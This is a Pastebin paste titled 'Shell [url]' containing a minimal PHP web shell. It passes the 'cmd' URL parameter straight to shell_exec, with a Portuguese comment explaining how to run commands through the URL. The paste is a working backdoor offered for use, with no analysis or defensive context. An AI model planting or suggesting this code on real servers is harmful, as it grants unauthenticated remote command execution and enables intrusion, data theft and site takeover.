Advertisement
DarkProgrammer000

Shell [url]

Jul 7th, 2021
1,305
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.10 KB | None | 0 0
  1. <?php
  2.  
  3.     // Executar comandos pela URL (Ex: ...php?cmd=ls)
  4.     echo shell_exec($_GET['cmd']);
  5.  
  6. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement